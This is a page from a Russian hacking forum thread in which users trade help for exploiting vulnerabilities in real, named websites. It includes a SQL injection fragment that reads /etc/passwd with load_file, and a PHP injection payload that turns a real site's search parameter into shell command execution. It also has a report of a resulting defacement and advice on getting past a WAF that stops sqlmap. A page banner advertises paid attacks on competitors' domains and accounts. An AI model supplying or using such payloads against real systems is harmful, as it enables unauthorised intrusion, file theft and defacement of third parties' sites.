Ваши вопросы по уязвимостям.

FORUMS

MEMBERS

RECENT POSTS

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 132 из 296

132

Опции темы

Поиск в этой теме

Опции просмотра

01.09.2016, 08:42

Sensoft

Постоянный

Регистрация: 14.06.2015

Сообщений: 396

С нами: 5745206

Репутация: 1

Цитата:

Сообщение от kacergei

↑
Имеется sql-inj через нее можно смотреть файлы
....mid((cast(concat(load_file(/etc/passwd),.....
Возможно ли вывод load_file сделать в base64?

Эм sql на файлы ?! Это как, не я не чего против не имею может просто не знал, если кто прошаренный киньте ссылку на подробное описани

𝕏 Twitter Reddit Telegram Копировать ссылку

01.09.2016, 09:21

kacergei

Новичок

Регистрация: 26.05.2007

Сообщений: 8

С нами: 9979143

Репутация: -5

Цитата:

Сообщение от Sensoft

↑
Эм sql на файлы ?! Это как, не я не чего против не имею может просто не знал, если кто прошаренный киньте ссылку на подробное описани

Я наверно немножко неправильно выразился: "Load File: Читает содержимое файла и возвращает его в виде строки."

Если у пользователя достаточно прав

Но вопрос остается открытым

01.09.2016, 12:23

~~faza02~~

Banned

Регистрация: 21.11.2007

Сообщений: 181

С нами: 9721141

Репутация: 1013

Цитата:

Сообщение от kacergei

можно, а толку, все равно по одному символу выводить

01.09.2016, 13:38

kacergei

Новичок

Регистрация: 26.05.2007

Сообщений: 8

С нами: 9979143

Репутация: -5

Цитата:

Сообщение от yarbabin

↑
можно, а толку, все равно по одному символу выводить

Не подскажешь как именно? на будущее

01.09.2016, 15:32

~~faza02~~

Banned

Регистрация: 21.11.2007

Сообщений: 181

С нами: 9721141

Репутация: 1013

http://dev.mysql.com/doc/refman/5.7/...tion_to-base64

02.09.2016, 02:34

Sensoft

Постоянный

Регистрация: 14.06.2015

Сообщений: 396

С нами: 5745206

Репутация: 1

Как эту php injection раскрутить ?

http://rimo.su/poisk-po-katalogu/?search=${@print(dump.sql)}

02.09.2016, 02:44

crlf

Постоянный

Регистрация: 18.03.2016

Сообщений: 663

С нами: 5344886

Репутация: 441

?search=${system($_GET[c])}&c=ls -la

02.09.2016, 03:11

Sensoft

Постоянный

Регистрация: 14.06.2015

Сообщений: 396

С нами: 5745206

Репутация: 1

Вопрос кто сделал что теперь когда переходишь по ссылки там написано "страдать ****" на английском

02.09.2016, 14:55

r1l

Новичок

Регистрация: 19.01.2016

Сообщений: 15

С нами: 5429846

Репутация: 0

Ребят помогите раскрутить

Код:

http://trafficswirl.com/teamsplash.php?tid=1%27

Ни как мне эта скуля не дается((

с --technique=EU не крутит, --level=5 --risk=3 тоже не крутит, ХАВИДЖИ раскручивает эту уязвимость, sqlmap не может(

либо я дурак либо лыжи правда не едут....

уязвимость раскручивается точно знаю, только как?(

#10

02.09.2016, 15:18

pw0ned

Участник форума

Регистрация: 08.01.2016

Сообщений: 118

С нами: 5445686

Репутация: 14

Цитата:

Сообщение от r1l

↑
Ребят помогите раскрутить

Код:

http://trafficswirl.com/teamsplash.php?tid=1%27

Ни как мне эта скуля не дается((
с --technique=EU не крутит, --level=5 --risk=3 тоже не крутит, ХАВИДЖИ раскручивает эту уязвимость, sqlmap не может(
либо я дурак либо лыжи правда не едут....
уязвимость раскручивается точно знаю, только как?(

WAF блочит если я не ошибаюсь. Крути руками